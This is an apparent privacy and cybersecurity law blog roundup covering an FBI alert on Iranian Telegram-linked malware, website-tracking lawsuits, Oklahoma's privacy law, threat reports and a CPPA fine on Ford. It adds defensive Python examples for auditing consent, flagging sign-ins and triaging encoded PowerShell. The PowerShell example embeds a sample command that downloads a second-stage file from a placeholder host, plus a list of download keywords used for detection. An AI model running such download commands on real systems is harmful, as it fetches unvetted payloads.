The Federal Bureau of Investigation (FBI) recently released a FLASH warning highlighting malicious cyber activity conducted by threat actors operating on behalf of Iran’s Ministry of Intelligence and Security. According to the FBI, these threat actors are using Telegram as a command-and-control infrastructure to push malware “targeting Iranian dissidents, journalists opposed to Iran, and other opposition groups around the world.” The FLASH was released “to maximize awareness of malicious Iranian cyber activity and provide mitigation strategies to reduce the risk of compromise” in light of the “elevated geopolitical climate of the Middle East and current conflict.”  

The FLASH is designed to warn network defenders, and the public, of continued malicious cyber activity by Iranian-backed cyber actors, and provides the tactics, techniques, and procedures used in this malware campaign.

The FBI notes that the threat actors use Signal to deploy various malware versions to infect machines running Windows operating systems and “could be used to target any individual of interest to Iran.”

According to the FLASH, the threat actors used social engineering to masquerade as commonly used programs or services on Windows machines. After compromise, they then “connected the infected machine to Telegram command and control bots that enabled remote user access to exfiltrate screen captures or files from the victim devices.” The threat actors include Handala Hack, which claimed responsibility for the Stryker attack. Handala Hack is also linked to another entity known as “Homeland Justice.”

Iranian-backed hackers continue to pose a threat to all companies because they leverage legitimate messaging apps like Telegram (through no fault of its own) to deliver payloads. If you or your company uses Telegram, or another messaging app, it is imperative to understand how these legitimate tools are used maliciously by threat actors. Follow the FBI’s guidelines and educate your users about this increased risk.

A new class action in the U.S. District Court for the Northern District of California alleges that Ace Hardware tracked users’ online activity through third-party tools before users could make meaningful choices through cookie consent tools, and that it continued even after users took steps to opt out. The plaintiffs claim that the Ace Hardware website intercepted browsing data before consent choices could be made, promised opt-out control but did not honor it, and used multiple third-party tools to collect detailed activity. Specifically, the complaint alleges tools from Google Analytics, Bazaarvoice, and other companies were used to collect information such as search terms, product views, and device identifiers.

In plain terms, the lawsuit frames the issue as a mismatch between what users were told about their privacy choices and what allegedly happened behind the scenes. While the lawsuit focuses on Ace Hardware’s website practices, it also reflects on the broader scrutiny of third-party analytics and marketing tools, especially where consent mechanisms are alleged to be ineffective or misleading.

Even when companies believe they have implemented standard consent banners, plaintiffs increasingly focus on what the underlying scripts actually do in real time. This case is a reminder that privacy risk often turns on implementation details, not policy language. Companies should pressure-test consent flows against what tags and pixels actually transmit, including on first page load and after opt-out selections. Aligning disclosures, consent settings, and real-time script behavior is increasingly where litigation exposure is won or lost.
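To make that pressure test concrete, here is an added Python example (not drawn from the complaint or from any company's code) that replays a captured request timeline against the consent state in force at each moment and reports every tracker request sent before a choice was made or after an opt-out. The tracker domain list, the capture, and the state names `no_choice`, `accepted`, and `opted_out` are assumptions constructed for illustration.

```python
from bisect import bisect_right
from urllib.parse import urlsplit, parse_qs

# Assumption: illustrative domains for the vendors named in the complaint;
# replace with your own tag inventory.
TRACKER_DOMAINS = ("google-analytics.com", "bazaarvoice.com")

# Constructed capture: (milliseconds since navigation start, request URL).
SAMPLE_REQUESTS = [
    (120, "https://www.example-shop.test/"),
    (480, "https://www.google-analytics.com/g/collect?v=2&cid=555.123"
          "&dl=https%3A%2F%2Fwww.example-shop.test%2F"),
    (900, "https://cdn.example-shop.test/app.js"),
    (5300, "https://www.google-analytics.com/g/collect?v=2&cid=555.123&en=view_item"),
    (5450, "https://network.bazaarvoice.com/a.gif?cl=PageView&deviceid=abc123"),
]
# Constructed banner interactions: (milliseconds, new consent state).
SAMPLE_CONSENT_EVENTS = [(4000, "opted_out")]


def tracker_domain(url):
    """Return the matching tracker domain for a URL, or None for other hosts."""
    host = (urlsplit(url).hostname or "").lower()
    for domain in TRACKER_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def consent_state_at(t_ms, consent_events):
    """Consent state in force at t_ms; 'no_choice' before any banner interaction."""
    times = [t for t, _ in consent_events]
    i = bisect_right(times, t_ms)
    return consent_events[i - 1][1] if i else "no_choice"


def audit(requests, consent_events):
    """List tracker requests sent while the visitor had not accepted tracking."""
    consent_events = sorted(consent_events)
    findings = []
    for t_ms, url in sorted(requests):
        domain = tracker_domain(url)
        state = consent_state_at(t_ms, consent_events)
        if domain and state != "accepted":
            findings.append({
                "t_ms": t_ms,
                "state": state,
                "tracker": domain,
                # Parameter names show what kind of data left the browser.
                "params_sent": sorted(parse_qs(urlsplit(url).query)),
            })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_REQUESTS, SAMPLE_CONSENT_EVENTS):
        print(finding)
```

In practice the request list would come from a browser HAR export or proxy log taken on a clean profile, once with no banner interaction and once after selecting opt-out.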

On March 20, 2026, Oklahoma Governor Kevin Stitt signed into law Enrolled Senate Bill No. 546, a comprehensive privacy law that will go into effect on January 1, 2027—this makes Oklahoma the 21st state to enact a comprehensive privacy law. The bill follows the common model used in many state privacy statutes: it grants consumers baseline privacy rights, requires opt-outs for targeted advertising and certain disclosures, and expects companies to document and manage higher-risk processing.

In general, the law applies to a controller or processor doing business in Oklahoma, or targeting Oklahoma residents, and, during a calendar year, either controls or processes personal data of at least 100,000 consumers, or controls/processes personal data of at least 25,000 consumers and derives over 50% of gross revenue from the sale of personal data.

Consumers have rights to access and confirm processing, correct inaccuracies, delete personal data (including data “provided by or obtained about” the consumer), obtain portable data the consumer provided, and opt out of targeted advertising, the sale of personal data, and certain profiling with significant effects.

“Sale” is the exchange of personal data for monetary consideration, with carve-outs including disclosures to processors, for requested services, and to affiliates. Notably, this is narrower than laws in states that include “valuable consideration” in the definition of sale. “Sensitive data” includes precise geolocation, biometric data used for unique identification, and known children’s data, and generally requires opt-in consent.

The statute also calls for data minimization and reasonable security, required privacy notice disclosures (including clear disclosure of sale/targeted advertising, where applicable), and data protection assessments for targeted advertising, sale of personal data, sensitive data processing, and certain profiling/high-risk processing. It will be enforced by the Attorney General, includes a 30-day cure process, and provides no private right of action. Companies should use the lead time to confirm applicability and operationalize opt-outs, consent, consumer requests, vendor controls, and assessments.

Mandiant recently issued its M-Trends 2026 Report, a must-read for all cybersecurity professionals. The report provides several conclusions and insights, including that both nation states and run-of-the-mill financially motivated threat actors are “integrating AI to accelerate the attack lifecycle.” These threat actors are “increasingly relying on large language models (LLMs) as a strategic force multiplier to move beyond mass email campaigns toward hyper-personalized, rapport-building, social engineering.”

Speaking of social engineering, the report also highlights that threat actors are using vishing campaigns more frequently and quite successfully. Vishing now holds the number two slot in how threat actors successfully attack companies. We have seen an increase in successful vishing campaigns, and the Mandiant Report confirms that threat actors are increasingly using this attack vector over other methods. This highlights the continued need to educate employees (including customer service representatives, help desk, and human resources employees) on these tactics and to implement internal processes to address identity management.

And, of course, ransomware is as prevalent and catastrophic as ever. The report concludes that ransomware attackers are increasing the pressure on companies to pay by “systematically targeting backup infrastructure, identity services, and virtualization management planes” to limit a company’s ability to recover. Therefore, Mandiant suggests that companies prioritize these areas to give them a better posture to recover.

The Mandiant Report provides a real-world analysis of recent threats (and suggestions to mitigate them) that is useful for security professionals to assess current risks.

Carfax, Inc. faced an early loss in a closely-watched privacy case under the federal Driver’s Privacy Protection Act (DPPA), after a judge in Maryland refused to throw out a proposed class action alleging the company sold drivers’ personal information sourced from crash and vehicle records. The plaintiff alleges that Carfax obtained his DPPA-protected personal information from a crash report tied to a 2023 auto accident and then sold that data to third parties. He claims this happened without his consent and without Carfax ensuring that downstream recipients were entitled to receive the information under the DPPA.

On Monday, Judge Julie R. Rubin of the U.S. District Court for the District of Maryland denied Carfax’s motion to dismiss. The court held that the plaintiff plausibly alleged Carfax obtained and sold his DPPA-protected information for an impermissible purpose under the statute. Importantly, Judge Rubin signaled that this is not the final word on the merits. She denied the motion to dismiss without foreclosing Carfax from reasserting its arguments later. The company can renew its legal challenges at summary judgment, once there is a “full record” showing how the crash report was actually prepared and handled.

Carfax argued that the crash report at issue was not covered by the DPPA because it was obtained from a police department, not from a department of motor vehicles. The plaintiff responded that the report should still qualify as a covered “motor vehicle record” because it was generated by the Maryland Motor Vehicle Administration before being provided to police. Judge Rubin acknowledged that the case law is mixed on this issue, and she described Carfax’s argument as “well-taken” and raising “serious questions (if not doubts)” about the plaintiff’s ability to ultimately prevail. Still, she concluded the uncertainty in the law did not justify dismissal at the pleading stage, especially without a developed factual record clarifying the report’s creation and flow. Carfax also argued that the plaintiff’s claim that Carfax lacked a permissible purpose was too conclusory. Judge Rubin agreed the allegations “could certainly be more robust,” but found them sufficient when considered alongside the allegations about Carfax’s business model and practices. The complaint, as described, alleges Carfax collects and sells vehicle history and accident data from thousands of sources and markets access to a database of more than 1.5 million police reports. At this stage, that context helped bridge the gap between “possible” and “plausible.”

This ruling is a reminder of a practical reality in privacy class actions. Motions to dismiss often fail when the dispute turns on how data was sourced, processed, and sold, since those details frequently sit with the defendant and emerge in discovery. For companies that traffic in large-scale driver and crash datasets, the opinion also highlights two recurring DPPA pressure points: (1) whether a document is a covered “motor vehicle record” can depend on provenance and process, not just where a defendant says it got the record; and (2) even if a company claims a DPPA-compliant use, plaintiffs may survive early dismissal by alleging the seller did not verify that purchasers were entitled to receive the data.

According to Security.org, “every 4.9 seconds, someone becomes a victim of identity theft in the United States” and the Federal Trade Commission receives over 6.4 million reports of identity theft and fraud every year.

Identity theft incidents continue to climb, with the average amount lost reaching $400 per person. The highest number of cases are attributed to financial fraud, including credit card fraud (stolen credit cards and fraudulent new accounts) and fraudulent bank transfers.

Interestingly, age and residence have an impact on the prevalence of identity theft. Millennials are hit the hardest, with 42% of millennials becoming identity theft victims, compared to 24% of Generation X, 21% of Generation Z, and a mere 11% of Baby Boomers. That said, Baby Boomers suffer the largest losses per incident due to bank account fraud. If you live in Florida, you are at higher risk, which contrasts with South Dakota, which has the lowest geographic risk.

Security.org suggests that simple measures can be taken to prevent identity theft, including checking your credit report, setting up account alerts, and reviewing privacy settings on social media accounts. Additional measures I’d like to include are:

  • multi-factor authentication on all financial accounts;
  • checking explanation of benefit statements;
  • being wary of vishing, phishing, smishing, and quishing requests;
  • avoiding providing your credentials to anyone;
  • avoiding any money transfer authentication through email;
  • limiting sharing on social media; and
  • staying informed of new fraud techniques.

Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis about how important it is to protect their usernames and passwords and to be highly vigilant when being asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based: where a threat actor attempts to use an authorized user’s credentials to access a company’s network. Many used agents that the organization did not authorize, a clear indication that it was not the authorized user trying to log on. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.
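The two signals described above can be checked directly against sign-in logs. The following Python example is added here for illustration and is not Expel's detection logic; the log format, the approved user-agent prefixes, the allowed country list, and the sample lines (including the placeholder country code `ZZ`) are all constructed assumptions.

```python
import shlex

# Assumptions: client software and sign-in locations this organization expects.
APPROVED_AGENT_PREFIXES = ("Mozilla/5.0", "Microsoft Office/")
ALLOWED_COUNTRIES = {"US", "CA"}

# Constructed sign-in log lines: timestamp followed by key=value pairs.
SAMPLE_LOG = """\
2025-11-03T14:02:11Z user=akim result=success country=US agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2025-11-03T14:05:40Z user=akim result=success country=US agent="python-requests/2.31.0"
2025-11-03T14:09:02Z user=bcho result=failure country=ZZ agent="Mozilla/5.0 (X11; Linux x86_64)"
2025-11-03T14:09:30Z user=bcho result=success country=ZZ agent="axios/1.6.2"
2025-11-03T14:12:55Z user=dlee result=success country=CA agent="Microsoft Office/16.0"
"""


def parse_line(line):
    """Split one log line into a dict; shlex keeps quoted agent strings intact."""
    ts, rest = line.split(" ", 1)
    fields = dict(token.split("=", 1) for token in shlex.split(rest))
    fields["ts"] = ts
    return fields


def evaluate(event):
    """Return the reasons a sign-in deviates from policy (empty list if none)."""
    reasons = []
    # User-Agent is client-supplied and can be spoofed, so a match proves
    # little; a mismatch is the useful signal.
    if not event["agent"].startswith(APPROVED_AGENT_PREFIXES):
        reasons.append("unapproved_agent")
    if event["country"] not in ALLOWED_COUNTRIES:
        reasons.append("unexpected_location")
    return reasons


def detect(log_text):
    """Flag policy deviations; a successful flagged sign-in outranks a failed one."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        reasons = evaluate(event)
        if reasons:
            alerts.append({
                "ts": event["ts"],
                "user": event["user"],
                "reasons": reasons,
                "severity": "high" if event["result"] == "success" else "medium",
            })
    return alerts


def accounts_to_contain(alerts):
    """Accounts with a successful flagged sign-in: reset credentials, revoke sessions."""
    return sorted({a["user"] for a in alerts if a["severity"] == "high"})


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print("contain:", accounts_to_contain(found))
```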

The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company-sanctioned PDF editor, users may search on the Internet for one to assist with editing a PDF to make a project easier. If a user downloads a fake PDF editor like SupremePDF, the user is unaware that the fake PDF editor can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along to users as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.
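For defenders, the encoded PowerShell step is one of the easier parts of this chain to triage from process-creation logs, because the argument is only Base64 over UTF-16LE text. The Python example below is added for illustration and is not Expel's tooling; the event fields, host names, parent process name, and commands are constructed samples, and the download marker list is an assumption to tune.

```python
import base64
import re

# A flag token followed by a Base64-looking argument.
FLAG_RE = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{16,})(?!\S)")
# Assumption: substrings that suggest the decoded script fetches another file.
DOWNLOAD_MARKERS = ("invoke-webrequest", "invoke-restmethod", "downloadstring",
                    "downloadfile", "net.webclient", "start-bitstransfer")


def encode_sample(script):
    """Build a constructed -EncodedCommand argument (Base64 of UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events; the field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent": "PdfEditorSvc.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -enc " + encode_sample(
         "Invoke-WebRequest -Uri https://example.invalid/stage2 -OutFile $env:TEMP\\u.bin")},
    {"host": "WS-022", "parent": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"host": "WS-031", "parent": "cmd.exe",
     "cmdline": "pwsh -EncodedCommand " + encode_sample("Get-Date")},
]


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line uses -EncodedCommand, else None."""
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return None
    for flag, blob in FLAG_RE.findall(cmdline):
        flag = flag.lower()
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec.
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # covers bad Base64 and invalid UTF-16
            continue
    return None


def triage(events):
    """Decode every encoded command; rate it 'high' when it appears to download."""
    findings = []
    for event in events:
        script = decode_encoded_command(event["cmdline"])
        if script is None:
            continue
        hits = [m for m in DOWNLOAD_MARKERS if m in script.lower()]
        findings.append({"host": event["host"], "parent": event["parent"],
                         "decoded": script, "download_markers": hits,
                         "severity": "high" if hits else "review"})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Pair the decoded text with the parent process in the alert: a PDF utility's service spawning PowerShell is itself worth reviewing, whatever the script does.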

If you haven’t scheduled your cybersecurity annual training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.

As we reported last week, Stryker was attacked by Iranian-backed hackers in retaliation for Israeli and U.S. strikes against Iran. It was a significant cyberattack, known as a wiper attack. A wiper attack is designed not to extort money from a victim, but instead to send a message and destroy the victim’s data to cripple their operations. Stryker was a victim of a political attack that had a significant negative effect on its business operations. It was merely conducting business and got caught in the crosshairs of an international war.

Stryker has been transparent about the incident and how it has affected its products. Being a victim of a wiper attack is bad enough. But unfortunately, it became victimized again when, while responding to the cyberattack, it was sued by a former customer service employee alleging that Stryker failed to secure data and alleging a data breach. It is confounding to me to try to understand how the plaintiff can possibly allege a data breach when the attack just happened and an investigation was just starting.

The facts surrounding the Stryker attack will continue to develop, and Stryker will no doubt comply with any legal obligations that ultimately arise from the incident. That said, it is deeply disappointing to see an opportunistic plaintiff and counsel hit Stryker before facts are known, before any notification letters are sent (if even applicable), and while the company was down and actively responding to a significant attack.

Stryker should be allowed the time to assess what happened, respond appropriately, restore its operations, and complete its investigation before anyone determines whether a viable claim exists. Filing suit within days of the incident is premature and only serves as a distraction.

I feel particular empathy toward Stryker, as it took the hit for a political message—something that could have happened to any company. We should learn from this incident and support the company, rather than pile on while it is still working to recover.

The California Privacy Protection Agency (CPPA) issued a decision requiring Ford Motor Company to pay a fine of $375,703 and update its privacy practices following a settlement for its alleged violations of the California Consumer Privacy Act (CCPA). Under the CCPA, California residents have the right to direct a business to stop selling or sharing their personal information by opting out. According to the CPPA’s decision, Ford’s opt-out process for personal information collected through its digital properties and connected vehicle services required an identity verification step. Specifically, consumers had to verify their email address as part of the opt-out workflow. The CPPA concluded this added “unnecessary friction” for consumers trying to exercise their rights.

The result was not just added inconvenience, but the CPPA stated that Ford did not process opt-out requests unless the consumer completed the email verification step. Following the CPPA’s investigation, Ford has since processed opt-out requests that lacked verification. Further, in addition to the monetary fine, Ford must also conduct an audit of the tracking technologies on its website and ensure compliance with opt-out preference signals, including the Global Privacy Control.

This enforcement action highlights an increasingly practical regulatory focus. The question is not only whether an opt-out mechanism exists on paper, but also whether it works in a way that consumers can realistically use.

This matter signals that the CPPA is looking at the connected vehicle ecosystems and related digital properties, not just traditional web-only businesses. The lesson here is that if consumers must take extra steps that are not essential to submit or effectuate an opt-out, regulators may view that as deterring a consumer’s ability to exercise their rights.

A federal court in the Southern District of California declined to dismiss wiretapping and eavesdropping claims tied to Skullcandy Inc.’s alleged use of online trackers on its retail website, allowing the lawsuit to move forward. Plaintiff alleges that Skullcandy used tracking tools from Meta Platforms and Google to collect browser and purchase data. Jones v. Skullcandy, Inc., No. 3:2025cv01759 (S.D. Cal. 3/12/26).

The allegations include the use of the Meta Pixel, Google Analytics, and DoubleClick in violation of the California Invasion of Privacy Act. Skullcandy argued the California court lacked jurisdiction, but the district court judge was persuaded that it could exercise specific jurisdiction, focusing on the allegation that Skullcandy aimed its conduct at California through the use of the tracking technologies at issue. Skullcandy sought to transfer the case to Utah, where it has its principal place of business—the court was not convinced. The court focused on the fact that the plaintiff chose to sue in California where the alleged conduct took place, and that the plaintiff expected that class members would be in that state. This decision highlights that venue and jurisdiction defenses may be difficult to win when plaintiffs tie the alleged tracking conduct to the forum state. Even if your website terms of use call out governing law as the state in which you have your principal place of business, you may still be stuck in California court.